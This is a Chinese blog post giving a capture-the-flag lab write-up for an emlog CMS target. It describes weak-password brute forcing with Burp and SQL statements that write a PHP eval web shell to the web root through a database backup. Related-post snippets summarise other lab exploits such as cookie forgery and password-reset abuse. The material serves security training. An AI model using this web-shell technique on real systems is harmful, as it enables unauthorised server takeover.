CMS系统漏洞分析溯源(第6题)

最新推荐文章于 2023-10-29 08:00:00 发布

Yolo山药

最新推荐文章于 2023-10-29 08:00:00 发布

阅读量887

点赞数

分类专栏：文件上传文章标签：安全

本文链接：https://blog.csdn.net/weixin_47493074/article/details/127199507

版权

文件上传专栏收录该内容

4 篇文章 0 订阅

订阅专栏

漏洞复现

思路：先爆破用户密码，再上传一句话木马

在这里插入图片描述
找到页面用户

在这里插入图片描述

用brup弱口令爆破
在这里插入图片描述

找到密码登录，备份数据库

在这里插入图片描述

在导出的sql文件中，写入下列sql，再导入进去

Drop TABLE IF EXISTS emlog_shell;
Create Table emlog_shell(`cmd` longtext NOT NULL);
Insert INTO emlog_shell VALUES('<?php @eval($_POST[pass]);?>');
Select cmd from emlog_shell into outfile '/var/www/html/pass.php';
Drop TABLE IF EXISTS emlog_shell;

在这里插入图片描述

后面就是菜刀连接了

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Yolo山药

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

YzmCMS跨站脚本漏洞(CVE-2020-22394)复现

玄道的网安博客

11-28

4850

简介 YzmCMS基于 PHP 的轻量级开源内容管理系统。漏洞概述 YzmCMS v5.5版本存在跨站脚本漏洞，该漏洞源于编辑器中的member contribution function包含一个跨站点脚本(XSS)漏洞。影响版本 YzmCMS v5.5 环境搭建到官网下载源码 https://www.yzmcms.com/ 好像官网最近访问不了了，放个百度网盘的 https://pan.baidu.com/s/1y8_4FrGlUUrV0-LaGWJhWA 安装完成后 .

【墨者学院】CMS系统漏洞分析溯源(第6题)

weixin_43884770的博客

12-19

747

参与评论您还未登录，请先登录后发表或查看评论

墨者 - CMS系统漏洞分析溯源(第6题)

吃肉唐僧的博客

07-22

498

打开环境，根据题目提示上网搜索emlog博客的后台地址，一般为/admin 但是访问失败，应该是改过路径了用御剑扫描后台（坑点），只扫出以下地址分别访问这些地址都没有后台的，后来看别人的解题思路才发现别人一扫就出来了（换了很多个版本，珍藏版，目录优化版，加强字典版.....均扫不出，一把泪）这里参考https://blog.csdn.net/weixin_43884770...

墨者学院-CMS系统漏洞分析溯源(第6题)

a519395243的博客

12-26

588

按提示先找后台，用御剑找后台后台地址 ip/servlets/ 在首页找到 mozhe777 用户，利用emlog博客的漏洞，错误不刷新验证码爆破密码用burp 爆破爆破出密码为 qwer1234 登录成功后，点击数据库栏目再点击备份数据库编辑备份下来的数据库，在末尾添加sql（新建emlog_shell数据表，向该表中添加小马，写入文件，再删除） dr...

墨者学院-CMS系统漏洞分析溯源(第4题)

JimWu的博客

09-04

840

CMS系统漏洞分析溯源(第4题) 难易程度:★★★ 题目类型:身份认证和会话管理使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场，用wwwscan扫一下。发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp，显示还没有登陆。 3.使用cookie-editor，伪造cookie，添加use...

墨者学院 - CMS系统漏洞分析溯源(第4题)

多崎巡礼的博客

10-09

1065

使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...

CMS系统漏洞分析溯源(第2题)

weixin_50698958的博客

10-06

389

靶场： https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe 背景介绍某单位需新上线了一个系统，安全工程师“墨者”负责对系统的安全检测，确保该系统在上线后不存在安全漏洞。实训目标 1、了解并熟练使用linux命令； 2、了解PHPCMS的后台地址及其他相关漏洞资料； 3、了解html源码的重要性。解题方向登录后台后执行linux系统命令，查看web源码。解题思路： 1、打开靶场，首

墨者学院-CMS系统漏洞分析溯源(第7题)

JimWu的博客

09-04

994

CMS系统漏洞分析溯源(第7题) 难易程度:★★ 题目类型:CMS漏洞使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场，先在网上查一下dedecms的漏洞。知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫，然后打开burpsuite，访问/member/resetpassword.php，截包。我们send to repeater，修改get的参数 ?...

墨者靶场初级：CMS系统漏洞分析溯源（第7题）

qq_43233085的博客

01-18

877

墨者靶场初级：CMS系统漏洞分析溯源（第7题）题目背景介绍实训目标解题方向解题步骤题目背景介绍安全工程师对某即将上线的网站进行授权测试，发现是DEDECMS,请帮助工程师完成测试。实训目标 1、掌握此版本任意用户密码重置漏洞利用； 2、了解漏洞形成原因使用方法；解题方向通过漏洞查看已存在账号的资料，获得管理员后台。解题步骤启动靶机，访问链接，发现有两个已存在的用户admin和t...

CMS漏洞复现

qq_43613144的博客

07-20

6420

漏洞复现-啧啧啧

墨者学院 - WebShell代码分析溯源(第6题)

多崎巡礼的博客

08-03

464

审查代码，在图片文件夹中有php（有毒）使用了回调函数array_map（将用函数去执行每个参数，返回结果）、$_REQUEST、$_POST，通过分析，类似于第五题，用e来接受assert的base64加密的值作为函数，用POST作为密码使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST，key文件在/var...

最新系统漏洞--YzmCMS服务器端请求伪造漏洞

weixin_48555088的博客

10-21

1320

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用（二）